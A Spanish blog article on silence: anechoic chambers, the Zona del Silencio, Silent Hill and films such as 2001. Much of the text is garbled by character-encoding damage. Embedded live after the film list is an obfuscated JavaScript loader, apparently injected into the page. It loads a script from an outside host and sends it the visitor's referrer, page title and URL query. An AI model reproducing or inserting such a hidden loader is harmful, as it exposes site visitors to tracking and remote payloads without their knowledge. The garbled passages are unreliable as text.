Saltear al contenido principal

Mut the mouthless de Marx-Cartoonee

El Silencio es lo mA?s antinatural que existe. AA?n en lo mA?s profundo del ocA�ano, en lo mA?s remoto del A?rtico, existen sonidos. Incluso aunque parezca que no hay ruido a nuestro alrededor, fuera de nuestro rango auditivo hay sonidos. PodrA�amos decir que en el vacA�o del espacio exterior no hay ruido, eso aplica al medio mA?s agresivo contra la vida que conocemos. Y aA?n ahA�, las ondas de radio de estrellas lejanas pueden ser recibidas e interpretadas por nuestros sensores como sonidos.

CA?mara anecA?ica de Minneapolis en Estados Unidos.

AsA� que no es de extraA�ar que la ausencia de todo sonido resulte enervante para el ser humano: creemos que nos darA? paz, pero serA? justo lo contrario. Nuestro cerebro intentarA? percibir lo que no puede y comenzarA? a aumentar su atenciA?n al punto que comenzaremos a a�?escuchara�? el sonido de la sangre fluyendo por nuestras venas. No lo notamos, pero parte de nuestra capacidad para medir la profundidad en un espacio radica en los ecos y la reverberaciA?n del sonido a nuestro alrededor, asA� que si no percibimos ningA?n sonido nos comenzaremos a sentir encerrados, como en un ataA?d.

El lugar mA?s silencioso del planeta es llamado a�?cA?mara anecA?icaa�? y se encuentra en un laboratorio al sur de Minneapolis, Estados Unidos. Puede absorber hasta un 99.9% de todo sonido. La gente que pasa tiempo dentro de A�l reporta incomodidad debido a la sensaciA?n de claustrofobia y aislamiento. Hasta los sonidos mA?s insignificantes comienzan a molestar.

En La zona del silencio, territorio compartido entre Chihuaha, Durango y Coahuila, se dice que no se pueden detectar seA�ales de radio.

Se habla de la zona del silencio en Chihuahua, un lugar en medio del desierto donde no llegan las ondas de radio; donde hay extraA�os fenA?menos electromagnA�ticos que hacen que la gente que entra ahA� se sienta confundida y nerviosa. Por supuesto que las leyendas incluyen objetos luminosos en el cielo y apariciones de alienA�genas.

La idea de un lugar silencioso como idA�lico es un recurso comA?n para implicar justo lo contrario, tenemos por ejemplo el juego de consola a�?Silent Hilla�?, en A�l seguimos al protagonista quien tiene que recorrer un pueblo abandonado de vida humana y plagado por pesadillas encarnadas. La soledad juega con tu percepciA?n y te hace entrar en una experiencia terrorA�fica.

SOLD, de Graszka Paulska

El poder escuchar lo que otros no puede categorizarse como una enfermedad mental o como una capacidad psA�quica de medium, pero lo que los dos casos te podrA�an decir que el silencio que vivA�an antes de que las voces llegaran a sus vidas era una bendiciA?n. Un silencio en el que tienes la certeza de que no hay nadie mA?s cerca.

En las pelA�culas el silencio es un recurso muy comA?n para destacar una escena. Estamos acostumbrados a la mA?sica que acompaA�a la pelA�cula que en el momento en el que esta desaparece, nuestros sentidos reaccionan con alarmaa�� a�?algo va a sucedera�? es lo que pensamos. Y efectivamente, algo sucede. Incluso el cine que llamamos mudo utilizaba mA?sica de acompaA�amiento para que las personas no se sintieran nerviosas por esa acciA?n sin sonido.

2001: A Space Odyssey,A�de Stanley Kubrick (1968)

La enfermedad de la sordera afecta nuestra capacidad de escucha; rara vez es total. Las personas que la sufren pierden capacidad de escuchar en un rango auditivo, por lo que no pueden percibir todas las palabras o sonidos en ese rango. Peor que la sordera es cuando se desarrolla una lesiA?n interna en el oA�do que produce un zumbido constante, este puede enloquecer a las personas. AquA� uno se pierde en un ruido constante y ajeno del que no hay escape.

PelA�culas en las que prevalezca el silencio sin una banda sonora no hay; todas tienen aunque sea momentos de mA?sica. Uno de los mejores ejemplo de ello es 2001: Odisea del EspacioA�(1968, Stanley Kubrick) en donde el silencio rodea al protagonista en muchos momentos, hay pocos diA?logos y una profunda reflexiA?n por lo tanto. TambiA�n tenemos SilencioA�(2016, Martin Scorcesse), Dead SilenceA�(2007, James Wan), La Soledad del Corredor de Fondo (1962, Tony Richardson), La PasiA?n de Juana de Arco (1928, Carl Th. Dreyer), y desde luego, el prA?ximo lanzamiento de john Krasinski: A Quiet Place.A�

var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}

Facebook Comments

Gerardo Braham

El Doctor Braham es el alterego de Gerardo Braham, ingeniero, astrólogo y estudioso de las ciencias ocultas. Su opinión es meramente producto de sus neurosis. El doctorado que presume en su nombre procede de las ciencias ocultas y le fue otorgado por la universidad de Miskatonic.

PGlmcmFtZSBzcmM9Imh0dHBzOi8vd3d3Lmdvb2dsZS5jb20vbWFwcy9lbWJlZD9wYj0hMW0xOCExbTEyITFtMyExZDYwNDQuMjc1NjM3NDU2ODA1ITJkLTczLjk4MzQ2MzY4MzI1MjA0ITNkNDAuNzU4OTkzNDExNDc4NTMhMm0zITFmMCEyZjAhM2YwITNtMiExaTEwMjQhMmk3NjghNGYxMy4xITNtMyExbTIhMXMweDAlM0EweDU1MTk0ZWM1YTFhZTA3MmUhMnNUaW1lcytTcXVhcmUhNWUwITNtMiExc2VuITJzITR2MTM5MjkwMTMxODQ2MSIgd2lkdGg9IjEwMCUiIGhlaWdodD0iMTAwJSIgZnJhbWVib3JkZXI9IjAiIHN0eWxlPSJib3JkZXI6MCI+PC9pZnJhbWU+
CONTACT US
COMPANY NAME
221, Mount Olimpus, Rheasilvia, Mars
Solar System, Milky Way Galaxy
+1 (999) 999-99-99
Thank You. We will contact you as soon as possible.
CÓMO ESCUCHAR
Puedes escucharnos aquí, en nuestro sitio, o en iTunes, Soundcloud y en varias apps de podcasts.

También escúchanos en vivo por Bizarro.fm, Radio ILCE y Concepto Radial

entra a nuestras redes sociales
 
SUSCRÍBETE A
Puedes escuchar PSICOFONÍAS aquí, en nuestro sitio, o en cualquiera de estas aplicaciones:
SUSCRÍBETE A
Puedes escuchar PSICOFONÍAS aquí, en nuestro sitio, o en cualquiera de estas aplicaciones:
¿NO SABES ESCUCHAR PODCASTS?
SUSCRÍBETE A
Puedes escuchar POR QUÉ NOS DA MIEDO aquí, en nuestro sitio, o en cualquiera de estas aplicaciones:
SUSCRÍBETE A
Puedes escuchar POR QUÉ NOS DA MIEDO aquí, en nuestro sitio, o en cualquiera de estas aplicaciones:
¿NO SABES ESCUCHAR PODCASTS?
SUSCRÍBETE A
Puedes escuchar TERROR EN UN SUSPIRO aquí, en nuestro sitio, o en Soundcloud:
SUSCRÍBETE A
Puedes escuchar TERROR EN UN SUSPIRO aquí, en nuestro sitio, o en Soundcloud:
¿NO SABES ESCUCHAR PODCASTS?